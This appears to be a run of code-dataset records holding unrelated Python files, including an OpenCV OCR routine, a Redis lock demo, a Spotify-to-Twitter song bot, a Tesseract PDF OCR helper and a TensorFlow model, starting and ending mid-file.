#cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n elif (np.amin(loc2[1]) <= np.amax(loc[1]) and np.amax(loc2[1]) >= np.amin(loc[1])) and (np.amin(loc2[0]) <= np.amax(loc[0]) and np.amax(loc2[0]) >= np.amin(loc[0])):\r\n cv2.rectangle(originalImage,(min(np.amin(loc[1]),np.amin(loc2[1])),min(np.amin(loc[0]),np.amin(loc2[0]))),(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[min(np.amin(loc[0]),np.amin(loc2[0])):max(np.amax(loc[0]),np.amax(loc2[0])),min(np.amin(loc[1]),np.amin(loc2[1])):max(np.amax(loc[1]),np.amax(loc2[1]))],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = True\r\n count += 1\r\n else:\r\n if wide < 0.3*high:\r\n cv2.rectangle(originalImage,(np.amin(loc[1])-int(wide/1.5),np.amin(loc[0])),(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1])-int(wide/1.5):np.amax(loc[1])+int(wide/1.5)],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n else:\r\n cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1]):np.amax(loc[1])],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1]),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = False\r\n count += 1\r\n # else:\r\n # cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n print(count)\r\n # misconnect = False\r\n #horizontal separation\r\n loc_new = {}\r\n if region_type == 1:\r\n if regions < 15:\r\n blackAndWhiteImage = cv2.bitwise_not(blackAndWhiteImage)\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n mean_width = 0\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n size = len(np.unique(loc[0]))*len(np.unique(loc[1]))\r\n if size < size_thr*img_h*img_w or size > (img_h*img_w*0.75):\r\n blackAndWhiteImage[loc] = 0\r\n if len(np.unique(loc[0])) < img_h/7 or len(np.unique(loc[0])) > img_h/1.5: #len(np.unique(loc[1])) > img_w*0.2 or\r\n blackAndWhiteImage[loc] = 0\r\n labeled, regions = label(blackAndWhiteImage, filter)\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # mean_width += (np.amax(loc[1]) - np.amin(loc[1]))\r\n mean_width /= regions\r\n # for i in range(regions):\r\n # loc = np.where(labeled == i+1)\r\n # if len(np.unique(loc[1]))> 2.2*mean_width: #or len(np.unique(loc[1]))< mean_width/2: #(np.amax(loc[1]) - np.amin(loc[1])) > 2*mean_width:\r\n # #blackAndWhiteImage[loc] = 0\r\n # blackAndWhiteImage[np.unique(loc[0]), int((np.amax(loc[1]) + np.amin(loc[1]))/2)]= 0\r\n # labeled, regions = label(blackAndWhiteImage, filter)\r\n for i in range(regions):\r\n loc = np.where(labeled == i+1)\r\n loc_new.update({i :np.amin(loc[1])})\r\n\r\n print(loc_new)\r\n loc_sorted = {k: v for k, v in sorted(loc_new.items(), key=lambda item: item[1])}\r\n region= []\r\n box_min= []\r\n for key, value in loc_sorted.items():\r\n 
region.append(key)\r\n box_min.append(value)\r\n #print(region)\r\n boxes = False\r\n for j in range(len(region)):\r\n loc = np.where(labeled == (region[j]+1))\r\n try:\r\n loc2 = np.where(labeled == (region[j+1]+1))\r\n except:\r\n pass\r\n wide = np.amax(loc[1]) - np.amin(loc[1])\r\n high = np.amax(loc[0]) - np.amin(loc[0])\r\n if boxes == True:\r\n boxes = False\r\n continue #cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n elif (np.amin(loc2[1]) <= np.amax(loc[1]) and np.amax(loc2[1]) >= np.amin(loc[1])) and (np.amin(loc2[0]) <= np.amax(loc[0]) and np.amax(loc2[0]) >= np.amin(loc[0])):\r\n cv2.rectangle(originalImage,(min(np.amin(loc[1]),np.amin(loc2[1])),min(np.amin(loc[0]),np.amin(loc2[0]))),(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[min(np.amin(loc[0]),np.amin(loc2[0])):max(np.amax(loc[0]),np.amax(loc2[0])),min(np.amin(loc[1]),np.amin(loc2[1])):max(np.amax(loc[1]),np.amax(loc2[1]))],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(max(np.amax(loc[1]),np.amax(loc2[1])),max(np.amax(loc[0]),np.amax(loc2[0]))),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = True\r\n #print(\"here\")\r\n else:\r\n if wide < 0.25*high:\r\n cv2.rectangle(originalImage,(np.amin(loc[1])-int(wide/1.5),np.amin(loc[0])),(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1])-int(wide/1.5):np.amax(loc[1])+int(wide/1.5)],(32,64)), axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1])+int(wide/1.5),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n else:\r\n cv2.rectangle(originalImage,(np.amin(loc[1]),np.amin(loc[0])),(np.amax(loc[1]),np.amax(loc[0])),(0,0,255),1)\r\n char = model.predict(np.expand_dims(cv2.resize(originalImage[np.amin(loc[0]):np.amax(loc[0]), np.amin(loc[1]):np.amax(loc[1])],(32,64)) , axis = 0))\r\n cv2.putText(originalImage,classes[np.argmax(char[0])],(np.amax(loc[1]),np.amax(loc[0])),cv2.FONT_HERSHEY_COMPLEX,0.5,(0,255,0),1)\r\n boxes = False\r\n cv2.imwrite('results_OCR/'+image,originalImage)\r\n# cv2.imshow('Black white image', blackAndWhiteImage)\r\n# cv2.imshow('Original image',originalImage)\r\n# cv2.imshow('Gray image', grayImage)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()\r\n# cv2.imshow('test', blackAndWhiteImage)\r\n# cv2.imshow('test2',originalImage)\r\n# cv2.waitKey(0)\r\n# cv2.destroyAllWindows()","repo_name":"mangonizoo/container_ocr","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":13364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15750772498","text":"# author:丑牛\n# datetime:2020/9/24 14:16\nimport redis\nimport threading\n\nlocks = threading.local()\nlocks.redis = {}\n\n\ndef key_for(use_id):\n return \"account_{}\".format(use_id)\n\n\ndef _lock(client, key):\n return bool(client.set(key, True, nx=True, ex=5))\n\n\ndef _unlock(client, key):\n client.delete(key)\n\n\ndef lock(client, user_id):\n key = key_for(user_id)\n if key in locks.redis:\n locks.redis[key] += 1\n return True\n ok = _lock(client, key)\n if not ok:\n return False\n locks.redis[key] = 1\n return True\n\n\ndef unlock(client, user_id):\n key = key_for(user_id)\n if key in locks.redis:\n locks.redis[key] -= 1\n if locks.redis[key] <= 0:\n del 
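# Both passes above order the detected regions by sorting a {region: min_col}
# dict on its values and then walking the keys left to right. In miniature:
loc_new = {3: 120, 1: 5, 2: 60}
order = [k for k, _ in sorted(loc_new.items(), key=lambda kv: kv[1])]
print(order)   # [1, 2, 3]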
locks.redis[key]\n return True\n return False\n\n\nclinet = redis.StrictRedis()\nprint(\"lock\", lock(clinet, \"codehole\"))\nprint(\"lock\", lock(clinet, \"codehole\"))\nprint(\"unlock\", unlock(clinet, \"codehole\"))\nprint(\"unlock\", unlock(clinet, \"codehole\"))","repo_name":"hugfeature/demo-python","sub_path":"RedisTest/可重入性.py","file_name":"可重入性.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"34482896913","text":"l = [1,2,3,4,5,6]\n\n# for x in l:\n# if (x+1 - x) >0 :\n# print('increasing')\n# elif (x - x+1) < 0:\n# print('decresing')\n# #else :\n# print('afbhzasyvfgskjdis')\n\ndef function(list):\n a = []\n # count = 0\n for x in range(len(list)-1):\n if (((list[x + 1] - list[x]) > 0)):\n #print('increasing')\n # count += 1\n a.append('increasing')\n elif (((list[x+1] - list[x]) < 0)):\n a.append('decreasing')\n #print('decreasing')\n # count = 0\n elif ((list[x+1] - list[x]) == 0) :\n a.append('afbhzasyvfgskjdis')\n\n\n if a.count('increasing') == len(list)-1:\n print('increasing')\n elif a.count('decreasing') == len(list)-1:\n print('decresing')\n else:\n print('non monotoonic')\n\nfunction(l)\n\n# def short():\n# return all(x for x in range(len(l)) if l[x+1]-l[x]>0 )\n\n# print(short())","repo_name":"DHRUV-ICT/test","sub_path":"dailywork/pythonProject1/programs/20.py","file_name":"20.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11236425256","text":"import numpy as np\r\nimport csv\r\nimport plotly.express as px\r\n\r\ndef getDataSource(data_path):\r\n coffee = []\r\n sleep = []\r\n \r\n with open(data_path) as csv_file:\r\n csvReader=csv.DictReader(csv_file)\r\n for row in csvReader:\r\n coffee.append(float(row['Coffee in ml']))\r\n sleep.append(float(row['sleep in hours']))\r\n return {'x':coffee,'y':sleep}\r\n\r\ndef findCorrelation(data_source):\r\n correlation = np.corrcoef(data_source['x'],data_source['y'])\r\n print(\"correlation between coffee in ml vs sleep in hours\",correlation[0,1])\r\n\r\ndef setup():\r\n data_path = 'Coffee.csv'\r\n data_source = getDataSource(data_path)\r\n findCorrelation(data_source)\r\n\r\nsetup() ","repo_name":"hababi558/Coffee","sub_path":"coffi.py","file_name":"coffi.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31092630669","text":"import zmq\nfrom proxy import Proxy\nimport call\n\nclass zmqREQServiceProxy(Proxy):\n \"\"\"\n Basic JSONRPC Proxy using zmq.\n This class inherit of the jsonrpc proxy and define the __call__ method forwarding the request to.\n\n :serviceURLs:\n this is a list of the server URLs\n \"\"\"\n def __init__(self, serviceURLs, zmqContext=None):\n self.__serviceURLs = serviceURLs\n self.__context = zmqContext or zmq.core.context.Context.instance()\n self.__socket = self.__context.socket(zmq.REQ)\n for serv in serviceURLs:\n self.__socket.connect(serv)\n super(zmqREQServiceProxy, self).__init__()\n\n def __call__(self, *args, **kwargs):\n postdata = super(zmqREQServiceProxy, self).__call__(*args, **kwargs)\n self.__socket.send(postdata)\n return call.analyzeJRPCRes(self.__socket.recv())\n\n def __del__(self):\n '''\n This is not mandatory, the socket would be garbage collected.\n '''\n 
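# The reentrant Redis lock above layers a thread-local refcount on top of the
# atomic SET-with-NX/EX idiom. The counting logic alone, with the Redis round
# trips stubbed out by a plain set (illustrative only, not redis-py calls):
held = set()      # stands in for keys currently SET in Redis
counts = {}       # stands in for the thread-local refcounts

def lock(key):
    if key in counts:
        counts[key] += 1          # re-entry by the same holder
        return True
    if key in held:               # SET ... NX would fail: someone owns it
        return False
    held.add(key)
    counts[key] = 1
    return True

def unlock(key):
    if key not in counts:
        return False
    counts[key] -= 1
    if counts[key] <= 0:          # last release actually frees the lock
        del counts[key]
        held.discard(key)
    return True

print(lock("acct"), lock("acct"))       # True True  (reentrant)
print(unlock("acct"), unlock("acct"))   # True True  (fully released)
print("acct" in held)                   # False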
self.__socket.close()\n","repo_name":"sx4it/4am-core-deprecated","sub_path":"lib/common/jsonrpc/zmqProxy.py","file_name":"zmqProxy.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"42002221498","text":"import torch\nfrom trainer import *\nfrom dataloader import CoNLLReader, get_ner_reader, extract_spans\nfrom utils.metric import SpanF1\n\nforce = False\nfine = True\ndevice = 'cuda'\n\nif os.path.exists('valid_load.pkl') and not force:\n with open('valid_load.pkl', 'rb') as f:\n valid = pickle.load(f)\nelse:\n valid = CoNLLReader(target_vocab=mconern, encoder_model=encoder_model, reversemap=reveremap, finegrained=fine)\n valid.read_data(data=r'C:\\Users\\Rah12937\\PycharmProjects\\mconer\\multiconer2023\\train_dev\\en-dev.conll')\n with open('valid_load.pkl', 'wb') as f:\n pickle.dump(valid, f)\ndef calculate_macro_f1(label_file, pred_file):\n labels = [field for field in get_ner_reader(label_file)]\n preds = [field for field in get_ner_reader(pred_file)]\n\n # pdb.set_trace()\n\n pred_result = []\n label_result = []\n for pred, label in zip(preds, labels):\n print(pred_result)\n label_result.append(extract_spans(label[-1]))\n pred_result.append(extract_spans(pred[-1]))\n\n span_f1 = SpanF1()\n span_f1(pred_result, label_result)\n word_result = span_f1.get_metric()\n\n return word_result[\"macro@F1\"]\n\nfile_path = r'C:\\Users\\Rah12937\\PycharmProjects\\mconer\\multiconer2023\\train_dev\\en-dev.conll'\nmodel = NERmodelbase3(tag_to_id=mconern, device=device, encoder_model=encoder_model, dropout=0.3, use_lstm=True).to(\n device)\nmodel.load_state_dict(torch.load(r'C:\\Users\\Rah12937\\PycharmProjects\\mconer'\n r'\\runid_8303_EP_20_fine_xlm-b-birnnn-fl-0.8-sep_lr-alpha-2-gama-4'\n r'\\runid_8303_EP_20_fine_xlm-b-birnnn-fl-0.8-sep_lr-alpha-2-gama-4.pt'))\n\nvalidloader = DataLoader(valid, batch_size=32, collate_fn=collate_batch, num_workers=0)\nout_str = ''\n\neval_file = os.path.join('test_out.txt')\nfor batch in tqdm(validloader, total=1):\n outputs, focal_loss, all_prob, token_scores, mask, tags = model(batch, mode='predict')\n # convert to the required format for the user\n for idx, record in enumerate(batch[0]):\n # convert ids to token so that we can undertsnd the toke's behav\n words = tokenizer.convert_ids_to_tokens(record)\n preds = outputs['token_tags'][idx]\n slicer = [True if i.startswith('▁') else False for i in words[:len(preds)] ]\n filter_preds = np.array(preds)[np.array(slicer)]\n out_str += '\\n'.join(filter_preds)\n out_str += '\\n\\n'\nopen(eval_file, 'wt').write(out_str)\n\n# macro_f1_score = calculate_macro_f1(file_path, eval_file)\n# score_file = os.path.join('score_out.txt')\n# open(score_file, 'wt').write(str(macro_f1_score))","repo_name":"choudhary-shivani/mconer","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10948657193","text":"\nimport pytesseract\nimport os\nimport matplotlib.pyplot as plt\nfrom pdf2image import convert_from_path\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom io import FileIO as file\nimport json\n\ndef searchable_pdf(pdf_file):\n input_file_name = os.path.basename(pdf_file).split(\".\")[0]\n output_file_name = input_file_name + \"_converted.pdf\"\n images = convert_from_path(pdf_file)\n pdf_pages = [pytesseract.image_to_pdf_or_hocr(image, extension='pdf') for image in images]\n 
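# predict.py above keeps one prediction per word by testing tokens for the
# sentencepiece word-start marker '▁'. A toy illustration of that filter:
import numpy as np

tokens = ["▁New", "▁York", "▁is", "▁cr", "owd", "ed"]
preds = ["B-LOC", "I-LOC", "O", "O", "O", "O"]
starts = [t.startswith("▁") for t in tokens]
print(np.array(preds)[np.array(starts)].tolist())   # ['B-LOC', 'I-LOC', 'O', 'O']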
with open(output_file_name, \"wb\") as f:\n f.write(pdf_pages[0])\n if len(pdf_pages)>1:\n for i in range(len(pdf_pages)-1):\n with open(\"append.pdf\", \"wb\") as f:\n f.write(pdf_pages[i+1])\n merger = PdfFileMerger()\n merger.append(PdfFileReader(file(output_file_name, 'rb')))\n merger.append(PdfFileReader(file(\"append.pdf\", 'rb')))\n merger.write(output_file_name)\n os.remove(\"append.pdf\")\n print(\"searchable pdf created\")\n\n\ndef extract_text(pdf_file):\n input_file_name = os.path.basename(pdf_file).split(\".\")[0]\n output_file_name = input_file_name + \".json\"\n images = convert_from_path(pdf_file)\n txt_pages = [pytesseract.image_to_string(image) for image in images]\n with open(output_file_name, 'w') as f:\n json.dump(txt_pages, f)\n print(\"text extracted into json file\")\n","repo_name":"sangramz/PDF_OCR","sub_path":"app_main/tesseract_ocr.py","file_name":"tesseract_ocr.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11810882892","text":"import logging\n\n\ndef harmonic(input_number):\n \"\"\"\n function harmonic: calculate and print harmonic value\n :param input_number: int,enter n-th harmonic number\n :return:\n \"\"\"\n try:\n logging.basicConfig(filename='myapp.log', level=logging.INFO)\n logging.info(\"Started Harmonic Number\")\n harms = 1\n for i in range(2, input_number + 1):\n harms += 1 / i\n print(harms)\n logging.info(\"Finished Harmonic Number\")\n except ArithmeticError:\n logging.error(ArithmeticError)\n print(ArithmeticError)\n\n\nif __name__ == '__main__':\n number = int(input(\"Enter N-th Harmonic Number: \"))\n harmonic(input_number=number)\n","repo_name":"AshishP2000/Python_basic_programs","sub_path":"logical_programming/harmonic_number.py","file_name":"harmonic_number.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17262953308","text":"# troy_bot_test.py\nimport sys\nimport os\nimport time\nimport random\nimport tweepy\nimport spotipy\nfrom spotipy import oauth2\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\n# from credentials import *\nfrom os import environ\n\n# for heroku integration\nCONSUMER_KEY = environ['CONSUMER_KEY']\nCONSUMER_SECRET = environ['CONSUMER_SECRET']\nACCESS_TOKEN = environ['ACCESS_TOKEN']\nACCESS_TOKEN_SECRET = environ['ACCESS_TOKEN_SECRET']\nSPOTIFY_CLIENT_ID = environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_CLIENT_SECRET = environ['SPOTIFY_CLIENT_SECRET']\n\n# TODO: figure out spotify authorization thru heroku problem\n# TODO: need to clean up code where ever i can\n\n### Global Variables ###\n# Time interval for tweets (one per day - every 24 hours)\nINTERVAL = 60 * 60 * 24\n\n# set up OAuth and integrate with API; twitter test\nredirect_uri = \"http://localhost:8080\"\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\ntweepy_api = tweepy.API(auth)\n\n# user_uri = 'spotify:user:1250284673'\n# username = user_uri.split(':')[2]\nusername = 'spotify:user:1250284673'.split(':')[2]\nscope = 'playlist-modify-public'\n\ntoken = util.prompt_for_user_token(\n username=username,\n scope=scope,\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n redirect_uri=redirect_uri)\n\n# sp = spotipy.Spotify(auth_manager=spotipy.SpotifyOAuth(\n# username=username,\n# client_id=SPOTIFY_CLIENT_ID,\n# 
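# harmonic() above accumulates H_n = 1 + 1/2 + ... + 1/n. For large n this
# tracks ln(n) + gamma (the Euler-Mascheroni constant, ~0.5772):
import math

n = 10_000
h = sum(1 / i for i in range(1, n + 1))
print(round(h - math.log(n), 4))   # 0.5773, close to gamma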
client_secret=SPOTIFY_CLIENT_SECRET,\n# redirect_uri=redirect_uri,\n# scope='playlist-modify-public'))\n\nsp = spotipy.Spotify(auth=token)\n\n# playlist used for final version\n# playlist_uri = 'spotify:playlist:2AVp8hX9Xaiqg9xv8qp68v'\n# playlist to test if limit condition will be performed\nplaylist_uri = 'spotify:playlist:4CneB3XScAKgQseSXey2Yx'\nat_uri = 'spotify:playlist:3b64drC4E4qkcmiOs3cJaQ'\n\nplaylist_id = playlist_uri.split(':')[2]\nat_id = at_uri.split(':')[2]\n\nclass SpotifyTwitterBot:\n\n def __init__(self):\n self.twitter_playlist = sp.user_playlist(username,playlist_id)\n self.at_playlist = sp.user_playlist(username,at_id)\n\n def tweeted_check2(self, item):\n if any(song['track']['uri'] == item['track']['uri'] for song in self.at_playlist['tracks']['items']):\n return True\n else:\n print(\"Adding song to Tweeted playlist...\")\n print(item['track']['uri'])\n sp.user_playlist_add_tracks(username, at_id, [item['track']['uri']]) # need to test\n print(\"Removing song from test playlist...\")\n sp.user_playlist_remove_all_occurrences_of_tracks(username, playlist_id,[item['track']['uri']]) # also need to test\n return False\n\n # retrieves random song from playlist to send to tweet\n def get_random_song(self):\n # sp = spotipy.Spotify(auth_manager=spotipy.SpotifyOAuth(\n # username=username,\n # client_id=SPOTIFY_CLIENT_ID,\n # client_secret=SPOTIFY_CLIENT_SECRET,\n # redirect_uri=redirect_uri,\n # scope='playlist-modify-public'))\n\n token = util.prompt_for_user_token(\n username=username,\n scope=scope,\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n redirect_uri=redirect_uri)\n sp = spotipy.Spotify(auth=token)\n\n self.twitter_playlist = sp.user_playlist(username, playlist_id) # retrieve most recent version of playlist\n self.at_playlist = sp.user_playlist(username, at_id) # retrieve most recent version of TWEETED playlist\n tracks = self.twitter_playlist['tracks']\n\n item = random.choice(tracks['items'])\n\n # need to test using already tweeted playlist\n while self.tweeted_check2(item):\n print(\"Already tweeted. Searching again...\")\n item = random.choice(tracks['items'])\n \n # composes string to send for tweet\n tweet_string = \"[testing] sotd: {0} by {1}\\n{2}\".format(item['track']['name'], item['track']['artists'][0]['name'], item['track']['external_urls']['spotify'])\n print(tweet_string)\n self.at_playlist = sp.user_playlist(username, at_id)\n print(\"number of songs already tweeted: {0} out of {1} songs\".format(self.at_playlist['tracks']['total'], tracks['total']))\n\n tweepy_api.update_status(status=tweet_string)\n\ndef main():\n\n bot1 = SpotifyTwitterBot()\n # test_interval = 60 # 60 sec interval (for testing w heroku to see behavior)\n test_interval = 60 * 45 # 45 minute interval\n # test_interval2 = 60 * 60 * 6 # 6 hour interval\n\n while bot1.at_playlist['tracks']['total'] <= bot1.twitter_playlist['tracks']['total']:\n bot1.get_random_song()\n time.sleep(test_interval) # time interval to test with heroku deployment\n # time.sleep(INTERVAL)\n if bot1.at_playlist['tracks']['total'] == bot1.twitter_playlist['tracks']['total']:\n break\n\n if bot1.at_playlist['tracks']['total'] >= bot1.twitter_playlist['tracks']['total']:\n tweet_string = \"all songs from this playlist have been tweeted! thanks for the good time... 
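# The bot above avoids re-tweeting a song by checking an "already tweeted"
# playlist before each random pick. The same avoid-repeats loop with plain
# Python data in place of the Spotify calls:
import random

tracks = ["a", "b", "c"]
tweeted = set()
while len(tweeted) < len(tracks):
    pick = random.choice(tracks)
    if pick in tweeted:
        continue                  # already used, search again
    tweeted.add(pick)
    print("tweeting", pick)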
\\U0000270C\"\n \n print(tweet_string)\n tweepy_api.update_status(tweet_string)\n\nif __name__ == '__main__':\n main()","repo_name":"troymead/twitter_bot","sub_path":"troy_bot.py","file_name":"troy_bot.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21706795716","text":"\"\"\"This is a test module where several methods are defined\"\"\"\n# magic methods\n__name__ = \"Test\"\n__revision__ = \"1.2.1\"\n__func__ = \"test_enumerator()\"\n\n\n\n\n\n\n\n\n\nNUM_LIST = [1, 2, 8, 79]\nrv = \"Length of num list: {} \".format(len(NUM_LIST))\n# print(rv)\n\ndef test_enumerator(numbr_list):\n \"\"\"Test enumerate\"\"\"\n for i, item in enumerate(numbr_list):\n print(\"index \" + str(i) + \" item \" + str(item))\n\ndef test_range():\n \"\"\"Test range\"\"\"\n for item_x in range(6):\n print(item_x)\n\ndef test_zip():\n \"\"\"test zip\"\"\"\n x = [1, 2, 3]\n y = [4, 5, 6]\n zipped = zip(x, y)\n for item_x in zipped:\n print(item_x)\n print(item_x[0])\n\ndef check_greeting(data_in):\n rv = \"\"\n input_hi = [\"hi\", \"hello\", \"good day\", \"greetings\", \"how\"]\n for x in input_hi:\n if x == data_in.lower():\n rv = \"yes\"\n return rv\n\nprint(check_greeting(\"hi\"))\n# test_zip()\n\n# y = \"128\"\n# print(type(y))\n# x = int(y)\n# print(type(x))\n# test_zip()\n# test_range()\n# test_enumerator(NUM_LIST)\n","repo_name":"spawnmarvel/TSK_testit.tech","sub_path":"app/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13086991995","text":"class Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n hLarge = self.largestCut(h, horizontalCuts)\n vLarge = self.largestCut(w, verticalCuts)\n return (hLarge*vLarge)%1000000007\n\n def largestCut(self, l: int, cuts: List[int]) -> int:\n cuts.sort()\n lastCut = 0\n largeCut = -1\n for c in cuts:\n cut = c-lastCut\n if cut > largeCut:\n largeCut = cut\n lastCut = c\n\n cut = l - lastCut\n if cut > largeCut:\n largeCut = cut\n return largeCut","repo_name":"ragilr/leetcode","sub_path":"lcc-june2021/maximum-area-of-a-piece-of-cake-after-horizontal-and-vertical-cuts.py","file_name":"maximum-area-of-a-piece-of-cake-after-horizontal-and-vertical-cuts.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25235144845","text":"import tensorflow as tf\nimport functools\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\nLAYER1_NODE = 500\nBATCH_SIZE = 100\nWEIGHT_INIT = 1.#初始化所有来源样本的权重\nWEIGHT_THRESHOLD = 1.0 #阻止节点之间的数据传输\nDISTRIBUTE_NODE_NUM = 2 #参与的节点数目\nTRANSFER_FRE = 100 #相互传输的instance的频率,应该也是可以更改的\n\nLEARNING_RATE_BASE = 0.8\nLEARNING_RATE_DECAY = 0.99\nREGULARIZATION_RATE = 0.0001\nTRAINING_STEPS = 10000\nMOVING_AVERAGE_DECAY = 0.99\n\nlog_dir='./logs/T1.2/Model/'\nlog_dir1='./logs/T1.2/Model1/'\nlog_dir2='./logs/T1.2/Model2/'\nlog_tst ='./logs/T1.2/Test/'\ndef lazy_property(function):\n attribute = '_cache_' + function.__name__\n\n @property\n @functools.wraps(function)\n def decorator(self):\n if not hasattr(self, attribute):\n with self.graph.as_default():\n with tf.variable_scope(function.__name__):\n setattr(self, attribute, function(self))\n return getattr(self, attribute)\n\n return decorator\n\nclass Model:\n\n def __init__(self):\n self.graph = tf.Graph()\n self.x\n self.y_\n 
self.w\n        self.x_transfer\n        self.y_transfer\n        self.weights1\n        self.weights2\n        self.biases1\n        self.biases2\n        self.global_step\n        self.init_op\n        self.train_step\n        self.accuracy\n        self.loss\n        self.weights_node_update\n        self.transfer_weight_1\n        self.transfer_weight_2\n\n        self.scalar_acc\n        self.scalar_weight_1\n        self.scalar_weight_2\n        self.scalar_loss\n\n    # model inputs; shape = [None, INPUT_NODE], where None stands for the batch size\n    @lazy_property\n    def x(self):\n        return tf.placeholder(tf.float32, [None, INPUT_NODE], name = 'x-input')\n    @lazy_property\n    def y_(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y-input')\n    @lazy_property\n    def w(self):\n        return tf.placeholder(tf.float32, [None, ], name = 'all-instance-weight-local')\n    # to calculate the loss of a transferred BATCH, then adjust 'weights_node_1' for network\n    @lazy_property\n    def x_transfer(self):\n        return tf.placeholder(tf.float32, [None, INPUT_NODE], name = 'transfer-x-input')\n    @lazy_property\n    def y_transfer(self):\n        return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'transfer-y-input')\n\n    # hidden-layer parameters\n    @lazy_property\n    def weights1(self):\n        return tf.Variable(\n            tf.truncated_normal([INPUT_NODE, LAYER1_NODE], stddev = 0.1)  # initialization\n        )\n    @lazy_property\n    def biases1(self):\n        return tf.Variable(\n            tf.constant(0.1, shape = [LAYER1_NODE])\n        )\n    @lazy_property\n    def weights2(self):\n        return tf.Variable(\n            tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE], stddev = 0.1)\n        )\n    @lazy_property\n    def biases2(self):\n        return tf.Variable(\n            tf.constant(0.1, shape = [OUTPUT_NODE])\n        )\n\n    def inference(self, input_tensor, weights1, biases1,\n                  weights2, biases2):\n        layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)\n        return (tf.matmul(layer1, weights2) + biases2)\n\n    @lazy_property\n    def y(self):\n        return self.inference(input_tensor = self.x, weights1 = self.weights1\n            , biases1 = self.biases1, weights2 = self.weights2, biases2 = self.biases2)\n\n    @lazy_property\n    def global_step(self):\n        # the step counter must not be trainable, or the optimizer would update it\n        return 